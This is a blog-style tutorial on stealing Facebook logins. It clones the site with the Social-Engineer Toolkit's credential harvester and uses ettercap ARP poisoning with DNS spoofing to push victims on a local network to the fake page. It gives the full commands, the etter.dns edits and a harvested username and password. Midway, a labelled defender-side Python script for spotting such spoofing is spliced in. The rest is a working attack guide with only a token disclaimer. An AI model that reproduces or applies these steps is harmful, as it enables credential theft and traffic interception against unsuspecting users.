Thursday 28 July 2016

Cloning websites

Cloning any Website to Steal Usernames and Passwords

This is a tutorial on how to create a fake phishing page that steals a username and password, and how to force-redirect our victim to our fake phishing site when they browse to www.anysite.com.
Summary: We will create a fake clone of facebook.com and add a harvesting function. We will then configure a DNS spoof that forces our victim to our fake page when they try to navigate to www.facebook.com. When our victim types in the username and password, the credentials are written to a file on our machine, and we redirect the victim with those credentials to Facebook, resulting in a successful login so as not to arouse any suspicion.

  • Requirements:
    • Kali Linux
    • Social-Engineering Toolkit (included in Kali)
    • Apache webserver (included in Kali)
Basically we just need Kali Linux.
Boot up Kali Linux and open up a new terminal.
Start by typing ifconfig to see your IP and you will get something like this:
root@kali:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:39:29:6d
          inet addr:192.168.0.119  Bcast:192.168.0.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fe39:296d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:426547 errors:0 dropped:0 overruns:0 frame:0
          TX packets:307727 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:413710801 (394.5 MiB)  TX bytes:44428418 (42.3 MiB)
Now that we've got our IP, we're gonna set up the fake Facebook page and add a harvesting function to it using Setoolkit.
You can start SET by opening a terminal in Kali and typing setoolkit, as shown below:
root@kali:~# setoolkit
[-] New set_config.py file generated on: 2015-09-13 12:49:59.108423
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2015-09-13 12:49:59.108423
[*] SET is using the new config, no need to restart

           ..######..########.########
           .##....##.##..........##...
           .##.......##..........##...
           ..######..######......##...
           .......##.##..........##...
           .##....##.##..........##...
           ..######..########....##...

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 
Now go to: Social-Engineering Attacks -> Website Attack Vectors -> Credential Harvester Attack Method -> Site Cloner
Now it will ask for your IP and then the link to clone, like this:
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.0.119
USAGE ON WAN: To be able to use this attack on WAN and prank your friend, with “permission”, you need to port forward to port :80 on your router!
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com
NB: It may ask you to start Apache if it’s not already running. Just press “Y” for yes.
Apache is the application that functions as the webserver the phishing site runs on.
That’s it. We have the fake Facebook page running on Apache port :80 with the harvesting function, which will steal the username and password when the victim visits/logs on to our phishing site.
Now… Since we are lazy and don’t wanna force our victim to go to this link, http://192.168.0.119, we are just gonna force them to redirect to our fake Facebook page whenever they try to visit facebook.com.
All our web files are in the directory: /var/www
Here’s how we force them to whatever website we want.
WARNING: DNS SPOOFING will force the victim to the site of your choice. Hacking Defined Experts do not take any responsibility if your intentions are bad. This is a powerful tool and the victim will most likely not be able to reject or stop this attack.
First we need to enable IP forwarding so that incoming connections are passed on. To do that we need to type:
root@kali:~# echo "1" > /proc/sys/net/ipv4/ip_forward
Now we need to edit a config file to tell ettercap where to forward the connections. The config file is located at /etc/ettercap/etter.dns
To edit this file type:
root@kali:~# nano /etc/ettercap/etter.dns
That will open up etter.dns in the nano text editor.
CHANGE THE BLOCK BELOW FROM THIS:
################################

microsoft.com      A   107.170.40.56
*.microsoft.com    A   107.170.40.56
www.microsoft.com  PTR 107.170.40.56      # Wildcards in PTR are not allowed

TO THIS:

facebook.com      A   192.168.0.119
*.facebook.com    A   192.168.0.119
www.facebook.com  PTR 192.168.0.119      # Wildcards in PTR are not allowed

##########################################
USE CTRL+O TO SAVE & USE CTRL+X TO EXIT
Now the final step!
Use this command to activate the DNS spoof.
NOTE: My interface is eth0; be sure to set the right interface. You can find it by typing ifconfig.
root@kali:~# ettercap -Tqi eth0 -P dns_spoof -M arp /// ///
When your victim visits facebook.com this is what you will see in the terminal:
dns_spoof: A [facebook.com] spoofed to [192.168.0.119]
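A defender-side check for the two traces this setup leaves on the victim's network, added here as an example and not part of the original post: a public name answered with a non-global address, and one MAC address claimed by several IPs. The log format, the gateway address 192.168.0.1 and the internal suffix list are assumptions, and the sample data is constructed around the addresses shown above.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample data (not from the original post): resolver answers as
# "name A address" and neighbour-table rows in `ip neigh` format.
DNS_ANSWERS = """\
facebook.com A 192.168.0.119
www.facebook.com A 192.168.0.119
example.org A 93.184.216.34
printer.lan A 192.168.0.50
"""
NEIGH_TABLE = """\
192.168.0.1 dev eth0 lladdr 00:50:56:39:29:6d REACHABLE
192.168.0.119 dev eth0 lladdr 00:50:56:39:29:6d REACHABLE
192.168.0.50 dev eth0 lladdr 3c:52:82:aa:bb:cc STALE
"""
# Assumption: suffixes used only for internal names on this network.
INTERNAL_SUFFIXES = (".lan", ".local", ".internal")

def suspicious_dns(answers, internal=INTERNAL_SUFFIXES):
    """Return (name, ip) pairs where a public name resolves to a non-global address."""
    hits = []
    for line in answers.splitlines():
        m = re.fullmatch(r"(\S+)\s+A\s+(\S+)", line.strip())
        if not m:
            continue
        name = m.group(1).lower().rstrip(".")
        try:
            ip = ipaddress.ip_address(m.group(2))
        except ValueError:
            continue  # malformed address field, not an A answer we can judge
        if not name.endswith(internal) and not ip.is_global:
            hits.append((name, str(ip)))
    return hits

def shared_macs(neigh):
    """Return {mac: [ips]} for MACs claimed by more than one IP (ARP-poisoning sign)."""
    by_mac = defaultdict(list)
    for line in neigh.splitlines():
        m = re.match(r"(\S+) dev \S+ lladdr ([0-9a-f:]{17})", line.strip(), re.I)
        if m:
            by_mac[m.group(2).lower()].append(m.group(1))
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}

if __name__ == "__main__":
    for name, ip in suspicious_dns(DNS_ANSWERS):
        print(f"ALERT dns: {name} -> {ip} (public name, non-global address)")
    for mac, ips in shared_macs(NEIGH_TABLE).items():
        print(f"ALERT arp: {mac} answers for {', '.join(ips)}")
```

Dynamic ARP inspection on the switch and encrypted DNS to a trusted resolver remove the two conditions this check looks for.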
When the user logs in, he or she will be redirected to the real Facebook with a successful login.
Here is a screenshot of my Microsoft Edge browser in Windows 10. PS: I forgot to change Microsoft to facebook in etter.dns but you get the point. The current language in my browser is set to Norwegian so that’s what I’ll get as output as well.
[Screenshot: fake facebook]
To see the username and password open up the Harvester file located in /var/www/Harvester.txt
This is what you’ll see!
Array
(
    [lsd] => AVouXPnt
    [display] =>
    [enable_profile_selector] =>
    [legacy_return] => 1
    [profile_selector_ids] =>
    [trynum] => 1
    [timezone] => -240
    [lgndim] => eyJ3IjoxOTIwLCJoIjoxMDgwLCJhdyI6MTkyMCwiYWgiOjEwNDAsImMiOjI0fQ==
    [lgnrnd] => 103735_LJMl
    [lgnjs] => 1442172541
    [email] => HDE-Tutorial
    [pass] => Shittypassword
    [default_persistent] => 0
    [qsstamp] => W1tbMCwxMCwyMiwzMCwzNiw0Myw0Niw4OCwxMzYsMTU3LDE2NCwxNzMsMTg2LD$
)

Have fun and enjoy… Be careful!
